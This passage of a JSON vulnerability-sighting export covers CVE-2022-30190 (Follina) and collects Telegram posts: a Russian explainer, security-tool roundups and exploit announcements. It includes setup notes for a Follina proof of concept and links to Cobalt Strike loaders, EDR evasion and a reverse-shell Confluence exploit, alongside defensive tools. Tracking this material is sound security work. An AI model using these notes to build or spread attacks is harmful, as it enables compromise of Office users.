\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c?\n\n\u0425\u0430\u043a\u0435\u0440 \u0441\u043e\u0437\u0434\u0430\u0451\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office \u0438 \u043a\u0430\u043a-\u0442\u043e \u0435\u0433\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u2014 \u0447\u0435\u0440\u0435\u0437 \u0441\u0430\u0439\u0442\u044b, \u0441\u043e\u0446\u0441\u0435\u0442\u0438, \u0442\u043e\u0440\u0440\u0435\u043d\u0442-\u0440\u0430\u0437\u0434\u0430\u0447\u0438. \u0425\u043e\u0442\u044f \u0441\u0430\u043c\u044b\u043c \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u043c \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u043c \u0432\u0441\u0451 \u0435\u0449\u0451 \u043e\u0441\u0442\u0430\u0451\u0442\u0441\u044f e-mail-\u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0430 \u0441 \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c\u0438 \u0444\u0430\u0439\u043b\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u043e\u043f\u0440\u043e\u0432\u043e\u0436\u0434\u0430\u044e\u0442\u0441\u044f \u043a\u043b\u0430\u0441\u0441\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u043f\u043e\u0434\u0432\u043e\u0434\u043a\u043e\u0439, \u0447\u0442\u043e\u0431\u044b \u043f\u0440\u0438\u0432\u043b\u0435\u0447\u044c \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440: \u00ab\u0421\u0440\u043e\u0447\u043d\u043e \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0439 \u043a\u043e\u043d\u0442\u0440\u0430\u043a\u0442. \u0417\u0430\u0432\u0442\u0440\u0430 \u0435\u0433\u043e \u043d\u0443\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u0442\u044c\u00bb.\n\n\u0417\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0441\u0441\u044b\u043b\u043a\u0443 \u043d\u0430 HTML-\u0444\u0430\u0439\u043b, \u0432\u043d\u0443\u0442\u0440\u0438 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f JavaScript-\u043a\u043e\u0434. \u042d\u0442\u043e\u0442 \u043a\u043e\u0434 \u043a\u0430\u043a \u0440\u0430\u0437 \u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u2014 \u043e\u043d \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0447\u0435\u0440\u0435\u0437 MSDT \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0434\u0430\u043d\u043d\u044b\u043c. \u0415\u0441\u043b\u0438 \u0430\u0442\u0430\u043a\u0430 \u043f\u0440\u043e\u0448\u043b\u0430 \u0443\u0441\u043f\u0435\u0448\u043d\u043e, \u0445\u0430\u043a\u0435\u0440 \u0441\u043c\u043e\u0436\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b, \u043f\u0440\u043e\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c, \u043c\u0435\u043d\u044f\u0442\u044c \u0438\u043b\u0438 \u0443\u0434\u0430\u043b\u044f\u0442\u044c \u0444\u0430\u0439\u043b\u044b, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u043d\u043e\u0432\u044b\u0435 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u044b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.", "creation_timestamp": "2025-01-14T13:04:32.000000Z"}, {"uuid": "33958720-f6a3-4b56-b450-7b50ca966dec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3028", "content": "Tools - Hackers Factory \n\nAwesome Web3 hacking/security\n\nhttps://github.com/ManasHarsh/Awesome-Web3-security\n\nEducational Heap Exploitation\n\nThis repo is for learning various heap exploitation techniques. We use Ubuntu's Libc releases as the gold-standard. Each technique is verified to work on corresponding Ubuntu releases. \n\nYou can run apt source libc6 to download the source code of the Libc your are using on Debian-based operating system. You can also click \u25b6\ufe0f to debug the technique in your browser using gdb.\n\nhttps://github.com/shellphish/how2heap\n\n\u200bFastFinder\n\nIncident Response - Fast Suspicious File Finder.\n\nLightweight tool made for threat hunting, live forensics, and triage on both Windows and Linux Platforms. It is focused on endpoint enumeration and suspicious file finding based on various criteria:\n\n\u25ab\ufe0f file path/name\n\u25ab\ufe0f md5 / sha1 / sha256 checksum\n\u25ab\ufe0f simple string content match\n\u25ab\ufe0f complex content condition(s) based on YARA\n\nhttps://github.com/codeyourweb/fastfinder\n\n\u200bCVE-2022-30190 Follina POC\n\nHost exploit.html on localhost, port 80. Open the docx to pop calc.\n\nTo change the remote address the doc points to, open in 7Z and edit word\\rels\\document.xml.rels to point to a new location. YOU MUST keep the exclamation mark. It will literally not run if you omit this from the end of the URL.\n\nThe exploit must contain at least 3541 characters before the window.location.href, and they must be within the script tag. There is about 6000 or so included in the exploit.html\n\nhttps://github.com/onecloudemoji/CVE-2022-30190\n\n\u200bDaily updated proxy lists\n\nFor scraping and other information gathering automations:\n\nhttps://github.com/clarketm/proxy-list\nhttps://github.com/TheSpeedX/PROXY-List\nhttps://github.com/ShiftyTR/Proxy-List\nhttps://github.com/jetkai/proxy-list\n\nSocks5 for Telegram:\nhttps://github.com/hookzof/socks5_list \n\nfire\n\nfire is a simple tool meant to work in a pipeline of other scripts. It takes domains on stdin and outputs them on stdout if they resolve. The inspiration for this work is the filter-resolved Golang code in this repository. That repo is not updated in a long time and I thought that it was time to switch to the new Golang paradigm of modules. I also added a Dockerfile.\n\nhttps://github.com/thelicato/fire\n\n\u200bWindows-exploits\n\nhttps://github.com/lyshark/Windows-exploits\n\n\u200btoolbox-pentest-web\n\nEven though this box is primarily intended for offensive operation, many tools and scripts can also be used for defensive purposes, for example, in CI/CD pipelines as security validation.\n\nhttps://github.com/righettod/toolbox-pentest-web\n\n\u200bKaynStrike\n\nA User Defined Reflective Loader for #Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.\n\nhttps://github.com/Cracked5pider/KaynStrike\n\nsabre-ng\n\nFlexible C2 framework for Nation State Simulations in #RedTeam Assessments.\n\nhttps://github.com/aidden-laoch/sabre\n\n\u200bSplunk Security Content\n\nThis project gives you access to our repository of Analytic Stories, security guides that provide background on tactics, techniques and procedures (TTPs), mapped to the MITRE ATT&CK Framework, the Lockheed Martin Cyber Kill Chain, and CIS Controls. \n\nThey include Splunk searches, machine learning algorithms and Splunk Phantom playbooks (where available)\u2014all designed to work together to detect, investigate, and respond to threats.\n\nhttps://github.com/splunk/security_content\n\n\u200bHyperDbg Debugger\n\nOpen-source, community-driven, hypervisor-assisted, user-mode and kernel-mode Windows debugger with a focus on using modern hardware technologies. It is a debugger designed for analyzing, fuzzing and reversing.\n\nhttps://github.com/HyperDbg/HyperDbg\n\nssc-reading-list\n\nA reading list for software supply-chain security.\n\nhttps://github.com/chainguard-dev/ssc-reading-list\n\n\u200bArsenal\n\nJust a quick inventory, reminder and launcher for pentest commands.\n\nThis project written by pentesters for pentesters simplify the use of all the hard-to-remember commands\n\nhttps://github.com/Orange-Cyberdefense/arsenal\n\n#pentesting #redteam\n\nhttps://t.me/dilagrafie", "creation_timestamp": "2023-05-20T10:35:54.000000Z"}, {"uuid": "48717c24-0d80-4f80-9ba6-5e0ec9b1679d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/WARLOCK_DARK_ARMY_OFFICIALS/65", "content": "MSDT ZERO-DAY\n\nhttps://github.com/PwnC00re/PoC-CVE-2022-30190\n\n\ud83c\udfa9WARLOCK DARK ARMY OFFICIALS \ud83c\udfa9\n\n#exploit #zeroday #poc", "creation_timestamp": "2022-09-12T17:53:36.000000Z"}, {"uuid": "29bd9245-99d0-4139-8ea2-6735798a35a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/breachdetector/93760", "content": "\u26a0 Detectada filtraci\u00f3n \u26a0\n{\n  \"site\": \"Sinister.ly\",\n  \"Threat Actor\": \"hacxx\",\n  \"Content\": \"Hacxx MSDT 0-Day CVE-2022-30190 Exploit Generator\",\n  \"Detection Date\": \"06 Jun 2022 16:01\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 Data Leak monitoring system\ud83d\udd39", "creation_timestamp": "2022-06-06T16:03:49.000000Z"}, {"uuid": "1adbcb08-ab9b-4789-baa6-c283a5db17d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3124", "content": "AnoMark\n\nThis algorithm is a Machine Learning one, using Natural Language Processing (NLP) techniques based on Markov Chains and n-grams. It offers a way to train a theoretical model on command lines  datasets considered clean. Once done it can detect malicious command lines on other datasets.\n\nhttps://github.com/ANSSI-FR/AnoMark\n\n#cybersecurity #infosec\n\n\u200b\u200bCVE-2023-32117\n\nIntegrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints.\n\nhttps://github.com/RandomRobbieBF/CVE-2023-32117\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bGeoPincer\n\nA script that leverages OpenStreetMap's Overpass API in order to search for locations. These locations will be queried using a collection of establishments that are somewhat adjacent.\n\nhttps://github.com/tloja/GeoPincer\n\n#OSINT #cybersecurity #infosec\n\n\u200b\u200bAwesome Industrial Protocols\n\nCompilation of industrial network protocols resources focusing on offensive security.\n\n\u2022 You are currently viewing the Awesome Industrial Protocols page.\n\u2022 etailed pages for protocols are available in protocols.\n\u2022 All data is stored in MongoDB databases in db.\n\u2022 Turn/IP (in srcs) is a handy tool to manipulate this data, generate the awesome list and protocol pages, and simplify the research and test process on industrial protocols\n\nhttps://github.com/Orange-Cyberdefense/awesome-industrial-protocols\n\n#cybersecurity #infosec\n\n\u200b\u200bCVE-2023-36884-Checker\n\nScript to check for CVE-2023-36884 hardening.\n\nhttps://github.com/tarraschk/CVE-2023-36884-Checker\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bAlcatraz\n\nA x64 binary obfuscator that is able to obfuscate various different pe files including:\n\n\u2022 .exe\n\u2022 .dll\n\u2022 .sys\n\nhttps://github.com/weak1337/Alcatraz\n\n#infosec #pentesting #redteam\n\n\u200b\u200bCobalt Strike BOFs\n\nBeacon object files I made to use with #CobaltStrike.\n\nhttps://github.com/Und3rf10w/CobaltStrikeBOFs\n\n#infosec #pentesting #redteam\n\n\u200b\u200bWindows 11 Exploits\n\nCVE-2023-24892, CVE-2023-33131, CVE-2022-30129, CVE-2023-33137, CVE-2023-33145, CVE-2023-33148, CVE-2022-30190.\n\nhttps://github.com/nu11secur1ty/Windows11Exploits\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bADHunt v2.0\n\nA tool for enumerating Active Directory Enviroments looking for interesting AD objects, vulnerabilities, and misconfigurations. It currently uses a combination ldap queries and available tooling. It was built as a follow up to LinWinPwn.\n\nhttps://github.com/Auto19/ADHunt\n\n#infosec #pentesting #redteam\n\n\u200b\u200bIAMActionHunter\n\nIAMActionHunter is an IAM policy statement parser and query tool aims to simplify the process of collecting and understanding permission policy statements for users and roles in AWS Identity and Access Management (IAM). Although its functionality is straightforward, this tool was developed in response to the need for an efficient solution during day-to-day AWS penetration testing.\n\nhttps://github.com/RhinoSecurityLabs/IAMActionHunter\n\n#cybersecurity #infosec #pentesting\n\n\u200b\u200bSysPlant\n\nA small implementation in NIM of the currently known syscall hooking methods.\n\nhttps://github.com/x42en/sysplant\n\n#infosec #pentesting #redteam\n\n\u200b\u200bUnshackle\n\nOpen-source tool to bypass windows and linux passwords from bootable usb.\n\nhttps://github.com/Fadi002/unshackle\n\n#infosec #pentesting #redteam\n\n\u200b\u200bCASR\n\nCollect crash reports, triage, and estimate severity.\n\nhttps://github.com/ispras/casr\n\n#cybersecurity #infosec\n\n\u200b\u200bCVE-2023-27163\n\nTo assist in enumerating the webserver behind the webserver SSRF.\n\nhttps://github.com/seanrdev/cve-2023-27163\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bCS2BR BOF\n\nYou would like to execute BOFs written for #CobaltStrike in #BruteRatel C4? Look no further, we got you covered! CS2BR implements a compatibility-layer that make CS BOFs use the BRC4 API. This allows you to use the vast landscape that is BOFs in BRC4.\n\nhttps://github.com/NVISOsecurity/cs2br-bof\n\nDetails:\nhttps://blog.nviso.eu/2023/07/17/introducing-cs2br-pt-ii-one-tool-to-port-them-all/\n \n#infosec #pentesting #redteam\n\n\u200b\u200bhypobrychium\n\nAV/EDR completely ignore me. Duplicate the token of a running process and run a command.\n\nhttps://github.com/foxlox/hypobrychium\n\n#cve #infosec\n\n2/3", "creation_timestamp": "2023-07-22T17:37:23.000000Z"}, {"uuid": "067549eb-d70b-4199-80b7-0bb8e4873834", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3035", "content": "Tools - Hackers Factory \n\nVigil\n\nFirewall/IDS Project.\n\nFeatures:\n\u25ab\ufe0f Packet capturing using the libpcap library\n\u25ab\ufe0f Basic rules for signature based attack identification\n\u25ab\ufe0f Logging\n\u25ab\ufe0f Remote login shell\n\u25ab\ufe0f Statistics\n\nhttps://github.com/raging-loon/Vigil\n\nbadkeys\n\nTool and library to check cryptographic public keys for known vulnerabilities\n\nhttps://github.com/badkeys/badkeys\n\nResearch:\nhttps://fermatattack.secvuln.info\n\nPersistBOF \n\nTool To Help Automate Common Persistence Mechanisms.\n\nA tool to help automate common persistence mechanisms. Currently supports Print Monitor (SYSTEM), Time Provider (Network Service), Start folder shortcut hijacking (User), and Junction Folder (User)\n\nhttps://github.com/IcebreakerSecurity/PersistBOF\n\n\u200bIRIS\n\nWeb collaborative platform aiming to help incident responders sharing technical details during investigations.\n\nhttps://github.com/dfir-iris/iris-web\n\n\u200b\u200bThrough the Wire\n\nThrough the Wire is a proof of concept exploit for CVE-2022-26134, an OGNL injection vulnerability affecting Atlassian Confluence Server and Data Center versions <= 7.13.6 LTS and <= 7.18.0 \"Latest\". This was originally a zero-day exploited in-the-wild.\n\n\u25ab\ufe0f Vendor advisory\n\u25ab\ufe0f Volexity \"in-the-wild\" write-up\n\u25ab\ufe0f Rapid7 write-up\n\nThrough the Wire implements two different exploits. The reverse shell will shell out to bash and therefore be more likely to be detected. The file reader executes from memory and is therefore unlikely to be detected. The exploits only work on Linux installs of Confluence. They could work on Windows but I'm also lazy.\n\nhttps://github.com/jbaines-r7/through_the_wire\n\nmitigate-folina\n\nMitigates the \"Folina\"-ZeroDay (CVE-2022-30190)\n\nThis script will backup and then remove the affected registry key (as suggested by Microsoft) to mitigate CVE-2022-30190). If parameterized with \"-revert\" the script will reimport the key. This can be used when Microsoft releases a patch.\n\nScript must be run as administrator or NT-AUTHORITY\\SYSTEM\n\nhttps://github.com/derco0n/mitigate-folina\n\nResearch:\nhttps://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/\n\n\u200bFollinaScanner\n\nA tool written in Go that scans files & directories for the #Follina exploit (CVE-2022-30190)\n\nhttps://github.com/ErrorNoInternet/FollinaScanner\n\n\u200bUnlicense\n\nA #Python 3 tool to dynamically unpack executables protected with Themida/WinLicense 2.x and 3.x.\n\nWarning: This tool will execute the target executable. Make sure to use this tool in a VM if you're unsure about what the target executable does.\n\nFeatures:\n\u25ab\ufe0f Handles Themida/Winlicense 2.x and 3.x\n\u25ab\ufe0f Handles 32-bit and 64-bit PEs (EXEs and DLLs)\n\u25ab\ufe0f Handles 32-bit and 64-bit .NET assemblies (EXEs only)\n\u25ab\ufe0f Recovers the original entry point (OEP) automatically\n\u25ab\ufe0f Recovers the (obfuscated) import table automatically\n\nhttps://github.com/ergrelet/unlicense\n\n\u200bChainsaw\n\nRapidly Search and Hunt through Windows Event Logs\n\nChainsaw provides a powerful \u2018first-response\u2019 capability to quickly identify threats within Windows event logs. It offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in detection logic and via support for Sigma detection rules.\n\nFeatures:\nSearch and extract event log records by event IDs, string matching, and regex patterns\nHunt for threats using Sigma detection rules and custom built-in detection logic\nLightning fast, written in rust, wrapping the EVTX parser library by OBenamram\nDocument tagging (detection logic matching) provided by the TAU Engine Library\nOutput in an ASCII table format, CSV format, or JSON format\n\nhttps://github.com/Countercept/chainsaw\n\n\u200bADeleg\n\nIs an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest, along with their potential issues:\n\n\u25ab\ufe0f Objects owned by users\n\u25ab\ufe0f Objects with ACEs for users\n\u25ab\ufe0f Non canonical ACL\n\u25ab\ufe0f Disabled ACL inheritance\n\u25ab\ufe0f Default ACL modified in schema\n\u25ab\ufe0f Deleted delegation trustees\n\nhttps://github.com/mtth-bfft/adeleg", "creation_timestamp": "2023-05-21T09:47:13.000000Z"}, {"uuid": "b287b5f2-0ebc-4832-b02b-8c07cbb67373", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2859", "content": "Tools - Hackers Factory \n\nVigil\n\nFirewall/IDS Project.\n\nFeatures:\n\u25ab\ufe0f Packet capturing using the libpcap library\n\u25ab\ufe0f Basic rules for signature based attack identification\n\u25ab\ufe0f Logging\n\u25ab\ufe0f Remote login shell\n\u25ab\ufe0f Statistics\n\nhttps://github.com/raging-loon/Vigil\n\nbadkeys\n\nTool and library to check cryptographic public keys for known vulnerabilities\n\nhttps://github.com/badkeys/badkeys\n\nPersistBOF \n\nTool To Help Automate Common Persistence Mechanisms.\n\nA tool to help automate common persistence mechanisms. Currently supports Print Monitor (SYSTEM), Time Provider (Network Service), Start folder shortcut hijacking (User), and Junction Folder (User)\n\nhttps://github.com/IcebreakerSecurity/PersistBOF\n\n\u200bIRIS\n\nWeb collaborative platform aiming to help incident responders sharing technical details during investigations.\n\nhttps://github.com/dfir-iris/iris-web\n\n\u200b\u200bThrough the Wire\n\nThrough the Wire is a proof of concept exploit for CVE-2022-26134, an OGNL injection vulnerability affecting Atlassian Confluence Server and Data Center versions <= 7.13.6 LTS and <= 7.18.0 \"Latest\". This was originally a zero-day exploited in-the-wild.\n\n\u25ab\ufe0f Vendor advisory\n\u25ab\ufe0f Volexity \"in-the-wild\" write-up\n\u25ab\ufe0f Rapid7 write-up\n\nThrough the Wire implements two different exploits. The reverse shell will shell out to bash and therefore be more likely to be detected. The file reader executes from memory and is therefore unlikely to be detected. The exploits only work on Linux installs of Confluence. They could work on Windows but I'm also lazy.\n\nhttps://github.com/jbaines-r7/through_the_wire\n\nmitigate-folina\n\nMitigates the \"Folina\"-ZeroDay (CVE-2022-30190)\n\nThis script will backup and then remove the affected registry key (as suggested by Microsoft) to mitigate CVE-2022-30190). If parameterized with \"-revert\" the script will reimport the key. This can be used when Microsoft releases a patch.\n\nScript must be run as administrator or NT-AUTHORITY\\SYSTEM (can be deployed via GPP as a startscript or scheduled task)\n\nhttps://github.com/derco0n/mitigate-folina\n\n\u200bFollinaScanner\n\nA tool written in Go that scans files & directories for the #Follina exploit (CVE-2022-30190)\n\nhttps://github.com/ErrorNoInternet/FollinaScanner\n\n\u200bUnlicense\n\nA #Python 3 tool to dynamically unpack executables protected with Themida/WinLicense 2.x and 3.x.\n\nWarning: This tool will execute the target executable. Make sure to use this tool in a VM if you're unsure about what the target executable does.\n\nFeatures:\n\u25ab\ufe0f Handles Themida/Winlicense 2.x and 3.x\n\u25ab\ufe0f Handles 32-bit and 64-bit PEs (EXEs and DLLs)\n\u25ab\ufe0f Handles 32-bit and 64-bit .NET assemblies (EXEs only)\n\u25ab\ufe0f Recovers the original entry point (OEP) automatically\n\u25ab\ufe0f Recovers the (obfuscated) import table automatically\n\nhttps://github.com/ergrelet/unlicense\n\n\u200bChainsaw\n\nRapidly Search and Hunt through Windows Event Logs\n\nChainsaw provides a powerful \u2018first-response\u2019 capability to quickly identify threats within Windows event logs. It offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in detection logic and via support for Sigma detection rules.\n\nFeatures:\nSearch and extract event log records by event IDs, string matching, and regex patterns\nHunt for threats using Sigma detection rules and custom built-in detection logic\nLightning fast, written in rust, wrapping the EVTX parser library by OBenamram\nDocument tagging (detection logic matching) provided by the TAU Engine Library\nOutput in an ASCII table format, CSV format, or JSON format\n\nhttps://github.com/Countercept/chainsaw\n\n\u200bADeleg\n\nIs an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest, along with their potential issues:\n\n\u25ab\ufe0f Objects owned by users\n\u25ab\ufe0f Objects with ACEs for users\n\u25ab\ufe0f Non canonical ACL\n\u25ab\ufe0f Disabled ACL inheritance\n\u25ab\ufe0f Default ACL modified in schema\n\u25ab\ufe0f Deleted delegation trustees\n\nhttps://github.com/mtth-bfft/adeleg\n\n#cybersecurity #infosec #cybersec", "creation_timestamp": "2023-04-05T13:06:20.000000Z"}, {"uuid": "c01d4dfc-a3f9-4ed9-aea9-ae0458330604", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2848", "content": "Tools - Hackers Factory \n\nAwesome Web3 hacking/security\n\nhttps://github.com/ManasHarsh/Awesome-Web3-security\n\nEducational Heap Exploitation\n\nThis repo is for learning various heap exploitation techniques. We use Ubuntu's Libc releases as the gold-standard. Each technique is verified to work on corresponding Ubuntu releases. \n\nYou can run apt source libc6 to download the source code of the Libc your are using on Debian-based operating system. You can also click \u25b6\ufe0f to debug the technique in your browser using gdb.\n\nhttps://github.com/shellphish/how2heap\n\n\u200bFastFinder\n\nIncident Response - Fast Suspicious File Finder.\n\nLightweight tool made for threat hunting, live forensics, and triage on both Windows and Linux Platforms. It is focused on endpoint enumeration and suspicious file finding based on various criteria:\n\n\u25ab\ufe0f file path/name\n\u25ab\ufe0f md5 / sha1 / sha256 checksum\n\u25ab\ufe0f simple string content match\n\u25ab\ufe0f complex content condition(s) based on YARA\n\nhttps://github.com/codeyourweb/fastfinder\n\n\u200bCVE-2022-30190 Follina POC\n\nHost exploit.html on localhost, port 80. Open the docx to pop calc.\n\nTo change the remote address the doc points to, open in 7Z and edit word\\rels\\document.xml.rels to point to a new location. YOU MUST keep the exclamation mark. It will literally not run if you omit this from the end of the URL.\n\nThe exploit must contain at least 3541 characters before the window.location.href, and they must be within the script tag. There is about 6000 or so included in the exploit.html\n\nhttps://github.com/onecloudemoji/CVE-2022-30190\n\n\u200bDaily updated proxy lists\n\nFor scraping and other information gathering automations:\n\nhttps://github.com/clarketm/proxy-list\nhttps://github.com/TheSpeedX/PROXY-List\nhttps://github.com/ShiftyTR/Proxy-List\nhttps://github.com/jetkai/proxy-list\n\nSocks5 for Telegram:\nhttps://github.com/hookzof/socks5_list \n\nfire\n\nfire is a simple tool meant to work in a pipeline of other scripts. It takes domains on stdin and outputs them on stdout if they resolve. The inspiration for this work is the filter-resolved Golang code in this repository. That repo is not updated in a long time and I thought that it was time to switch to the new Golang paradigm of modules. I also added a Dockerfile.\n\nhttps://github.com/thelicato/fire\n\n\u200bWindows-exploits\n\nhttps://github.com/lyshark/Windows-exploits\n\n\u200btoolbox-pentest-web\n\nEven though this box is primarily intended for offensive operation, many tools and scripts can also be used for defensive purposes, for example, in CI/CD pipelines as security validation.\n\nhttps://github.com/righettod/toolbox-pentest-web\n\n\u200bKaynStrike\n\nA User Defined Reflective Loader for #Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.\n\nhttps://github.com/Cracked5pider/KaynStrike\n\nsabre-ng\n\nFlexible C2 framework for Nation State Simulations in #RedTeam Assessments.\n\nhttps://github.com/aidden-laoch/sabre\n\n\u200bSplunk Security Content\n\nThis project gives you access to our repository of Analytic Stories, security guides that provide background on tactics, techniques and procedures (TTPs), mapped to the MITRE ATT&CK Framework, the Lockheed Martin Cyber Kill Chain, and CIS Controls. \n\nThey include Splunk searches, machine learning algorithms and Splunk Phantom playbooks (where available)\u2014all designed to work together to detect, investigate, and respond to threats.\n\nhttps://github.com/splunk/security_content\n\n\u200bHyperDbg Debugger\n\nOpen-source, community-driven, hypervisor-assisted, user-mode and kernel-mode Windows debugger with a focus on using modern hardware technologies. It is a debugger designed for analyzing, fuzzing and reversing.\n\nhttps://github.com/HyperDbg/HyperDbg\n\nssc-reading-list\n\nA reading list for software supply-chain security.\n\nhttps://github.com/chainguard-dev/ssc-reading-list\n\n\u200bArsenal\n\nJust a quick inventory, reminder and launcher for pentest commands.\n\nThis project written by pentesters for pentesters simplify the use of all the hard-to-remember commands\n\nhttps://github.com/Orange-Cyberdefense/arsenal\n\n#pentesting #redteam", "creation_timestamp": "2023-04-04T11:31:24.000000Z"}, {"uuid": "62e403c9-8fbf-41f4-86c4-a36b4867c731", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/vPwnd/19273", "content": "MSDT ZERO-DAY\n\n\nhttps://github.com/PwnC00re/PoC-CVE-2022-30190", "creation_timestamp": "2022-06-01T03:37:08.000000Z"}, {"uuid": "72648e20-dba1-47ee-8390-cbb5d5eeead4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/tUEHTxaKBSTU2Y5sSCh7GbBw134FF8IyhyRditgv_Jo14H8", "content": "", "creation_timestamp": "2023-06-16T08:27:34.000000Z"}, {"uuid": "225b04ff-b0d0-4bb0-8047-319bde00b3ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/xytonicweb/124", "content": "Microsoft Office RCE - \u201cFollina\u201d MSDT Attack\n\nCVE-2022-30190\n\nhttps://github.com/JohnHammond/msdt-follina", "creation_timestamp": "2022-06-03T05:48:10.000000Z"}, {"uuid": "aef46227-8dca-4211-a659-c9d86f4948bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/breachdetector/91346", "content": "\u26a0 Detectada filtraci\u00f3n \u26a0\n{\n  \"site\": \"Telegram Channel\",\n  \"Threat Actor\": \u201cVPwnd\",\n  \"Content\": \"MSDT ZERO-DAY https://github.com/PwnC00re/PoC-CVE-2022-30190\u201d,\n  \"Detection Date\": \u201c01 Jun 2022 03:36\u201d,\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 Data Leak monitoring system\ud83d\udd39", "creation_timestamp": "2022-06-01T03:42:55.000000Z"}, {"uuid": "62465382-7277-4c29-8d6a-39a2b4c3298a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/8yasABRsBeQ7_fA7ekcVN5-Bf6YalSSK4RwFtvSF2nNKkrM", "content": "", "creation_timestamp": "2022-12-06T17:10:12.000000Z"}, {"uuid": "33dabe3e-82f4-44f4-9533-ad2cfc7fb043", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/vPwnd/492", "content": "MSDT 